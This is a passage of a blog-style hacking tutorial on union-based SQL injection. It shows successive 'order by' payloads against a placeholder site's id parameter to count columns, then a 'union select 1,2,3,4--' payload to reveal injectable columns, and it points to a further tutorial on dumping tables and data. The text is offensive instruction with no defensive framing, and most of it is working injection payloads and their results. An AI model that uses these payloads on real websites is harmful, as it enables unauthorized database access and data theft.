<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 1--</b></span><br />
<span style="font-size: small;">Page Normally Loaded.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 3--</b></span><br />
<span style="font-size: small;">Again Page Normally Loaded.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 5--</b></span><br />
<span style="font-size: small;">And Here We Get some Data missing From Page As Shown In The Above Picture.</span><br />
<span style="font-size: small;">Decrease our Columns Count from 5 to 4.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 4--</b></span><br />
<span style="font-size: small;">Web Page Loaded Normally here It Means Their Are 4 Total Number Of Columns.</span><br />
<span style="font-size: small;"> now We have To Prepare Our UNION BASED command.</span><br />
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 and 0 Union select 1,2,3,4--</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And After executing The Query You Can see the Vulnerable Columns Printed on the Web Page.</span><br />
<span style="font-size: small;">So For Further injecting like Getting Tables and Columns then Dumping Data .You can READ this Tutorial.</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">UNION BASED SQL INJECTION</a></span><br />
<span style="font-size: small;"><br /></span>
<span class="post-description" style="font-size: small; text-align: justify;"><b>Author : Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com1